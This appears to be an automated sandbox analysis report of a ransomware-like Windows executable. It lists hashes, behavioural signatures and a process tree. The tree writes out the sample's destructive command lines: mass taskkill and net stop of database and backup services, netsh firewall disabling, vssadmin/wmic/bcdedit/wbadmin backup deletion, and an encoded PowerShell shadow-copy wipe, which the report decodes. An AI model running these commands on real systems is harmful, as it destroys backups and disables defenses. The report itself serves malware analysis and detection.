Analysis
- max time kernel: 110s
- max time network: 135s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 27-07-2021 17:10
Static task: static1
Behavioral task: behavioral1
- Sample: 1069-cc87764d70827118862689d1630efc72547f97aa.exe
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: 1069-cc87764d70827118862689d1630efc72547f97aa.exe
- Resource: win10v20210410
General
- Target: 1069-cc87764d70827118862689d1630efc72547f97aa.exe
- Size: 3.2MB
- MD5: f17e50158a1faf71deb3a6e8b4f3271f
- SHA1: cc87764d70827118862689d1630efc72547f97aa
- SHA256: 99a0753cba25425651e42ff7673506aa4090a03d8398f702e41d80ca5c2b212e
- SHA512: e60404ec7d526dd522ca6347c1fbc87f9783b0c0fa31ca4b8aaa656718a8ceaaf26ec8259a31df58ddb0500df8b7a0f63ad7aca652860d50baf4bc66fdd7643b
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Disables Task Manager via registry modification
- Drops file in Drivers directory (1 IoCs)
  Processes:
  File created: C:\Windows\System32\drivers\etc\host (1069-cc87764d70827118862689d1630efc72547f97aa.exe)
- Modifies Windows Firewall (1 TTPs)
- Checks whether UAC is enabled
  Processes:
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (1069-cc87764d70827118862689d1630efc72547f97aa.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes:
  Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\@Adsız@.jpg" (1069-cc87764d70827118862689d1630efc72547f97aa.exe)
- Drops file in Windows directory (1 IoCs)
  Processes:
  File created: C:\Windows\Please Read ME!!!.log (1069-cc87764d70827118862689d1630efc72547f97aa.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 4 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe, PIDs 748, 2320, 3860, 4052
- Kills process with taskkill (14 IoCs)
  Processes: taskkill.exe, PIDs 4260, 4200, 4808, 3508, 4552, 4248, 4912, 2456, 4240, 1968, 3548, 680, 4680, 4996
- Modifies Control Panel (2 IoCs)
  Processes:
  Key created: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\desktop (1069-cc87764d70827118862689d1630efc72547f97aa.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\Desktop\TileWallpaper = "0" (1069-cc87764d70827118862689d1630efc72547f97aa.exe)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe, PID 2488 (three hits)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (image, PID: privileges enabled on the token):
  taskkill.exe, PID 680: SeDebugPrivilege
  vssvc.exe, PID 4140: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  taskkill.exe, PID 4200: SeDebugPrivilege
  WMIC.exe, PID 4300: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  powershell.exe, PID 2488: SeDebugPrivilege
  WMIC.exe, PID 4348: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  WMIC.exe, PID 4300 (second pass): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege (the listing stops here at the 64-row limit)
- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes: NOTEPAD.EXE, PID 4304
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID and image -> target PID and image; every pair is logged three times in the raw list, which stops at 64 rows):
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 1536 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 2172 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 2344 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 2472 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 2804 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 2912 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 3672 cmd.exe
  2184 1069-cc87764d70827118862689d1630efc72547f97aa.exe -> 3764 cmd.exe
  2172 cmd.exe -> 3684 net.exe
  2472 cmd.exe -> 748 vssadmin.exe
  1536 cmd.exe -> 680 taskkill.exe
  2804 cmd.exe -> 2320 vssadmin.exe
  3684 net.exe -> 1568 net1.exe
  3672 cmd.exe -> 3860 vssadmin.exe
  2344 cmd.exe -> 3936 netsh.exe
  2912 cmd.exe -> 2488 powershell.exe
  3764 cmd.exe -> 4052 vssadmin.exe
  1536 cmd.exe -> 4200 taskkill.exe
  2172 cmd.exe -> 4208 net.exe
  4208 net.exe -> 4236 net1.exe
  3672 cmd.exe -> 4300 WMIC.exe
  3764 cmd.exe -> 4348 WMIC.exe (logged once before the 64-row limit)
- System policy modification (1 TTPs, 17 IoCs)
  Processes (all by 1069-cc87764d70827118862689d1630efc72547f97aa.exe, all under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System):
  Set value (int) EnableVirtualization = "1"
  Set value (int) ConsentPromptBehaviorUser = "3"
  Set value (int) dontdisplaylastusername = "0"
  Set value (str) legalnoticecaption
  Set value (int) PromptOnSecureDesktop = "1"
  Set value (int) shutdownwithoutlogon = "1"
  Set value (int) undockwithoutlogon = "1"
  Set value (int) EnableLUA = "0"
  Set value (int) EnableUIADesktopToggle = "5"
  Set value (str) legalnoticetext
  Set value (int) scforceoption = "0"
  Set value (int) ValidateAdminCodeSignatures = "0"
  Set value (int) ConsentPromptBehaviorAdmin = "5"
  Set value (int) EnableInstallerDetection = "1"
  Set value (int) FilterAdministratorToken = "0"
  Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  Set value (int) EnableSecureUIAPaths = "1"
Processes
(tree depth from the report shown as [1] to [4]; each entry gives the image path, the command line, and the signatures hit by that process)
- [1] C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\1069-cc87764d70827118862689d1630efc72547f97aa.exe"
  signatures: Drops file in Drivers directory; Checks whether UAC is enabled; Sets desktop wallpaper using registry; Drops file in Windows directory; Modifies Control Panel; Suspicious use of WriteProcessMemory; System policy modification
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im sql.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im winword.*
      signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im wordpad.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im outlook.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im thunderbird.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im oracle.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im excel.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im onenote.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im virtualboxvm.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im node.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im QBW32.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im WBGX.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im Teams.*
      signatures: Kills process with taskkill
    - [3] C:\Windows\SysWOW64\taskkill.exe
      command line: taskkill /f /im Flow.*
      signatures: Kills process with taskkill
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop DbxSvc
      signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop DbxSvc
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop OracleXETNSListener
      signatures: Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop OracleXETNSListener
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop OracleServiceXE
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop OracleServiceXE
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop AcrSch2Svc
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop AcrSch2Svc
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop AcronisAgent
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop AcronisAgent
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop Apache2.4
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop SQLWriter
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop SQLWriter
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop MSSQL$SQLEXPRESS
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop MSSQLServerADHelper100
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop MongoDB
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop MongoDB
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop SQLAgent$SQLEXPRESS
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop SQLBrowser
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop SQLBrowser
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop CobianBackup11
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop CobianBackup11
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop cbVSCService11
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop cbVSCService11
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop QBCFMontorService
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop QBCFMontorService
    - [3] C:\Windows\SysWOW64\net.exe
      command line: net stop QBVSS
      - [4] C:\Windows\SysWOW64\net1.exe
        command line: C:\Windows\system32\net1 stop QBVSS
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\netsh.exe
      command line: netsh firewall set opmode disable
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB
      signatures: Interacts with shadow copies
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded
      signatures: Interacts with shadow copies
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin delete shadows /all /quiet
      signatures: Interacts with shadow copies
    - [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
      command line: wmic shadowcopy delete
      signatures: Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\cmd.exe (second instance with the same command line)
    command line: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\vssadmin.exe
      command line: vssadmin delete shadows /all /quiet
      signatures: Interacts with shadow copies
    - [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
      command line: wmic shadowcopy delete
      signatures: Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of a UTF-16LE string; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\system32\vssvc.exe
  command line: C:\Windows\system32\vssvc.exe
  signatures: Suspicious use of AdjustPrivilegeToken
- [1] C:\Windows\SysWOW64\net1.exe
  command line: C:\Windows\system32\net1 stop Apache2.4
- [1] C:\Windows\system32\NOTEPAD.EXE
  command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Please Read ME!!!.log
  signatures: Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\Desktop\Please Read ME!!!.log
  MD5: 81051bcc2cf1bedf378224b0a93e2877
  SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
  SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
  SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d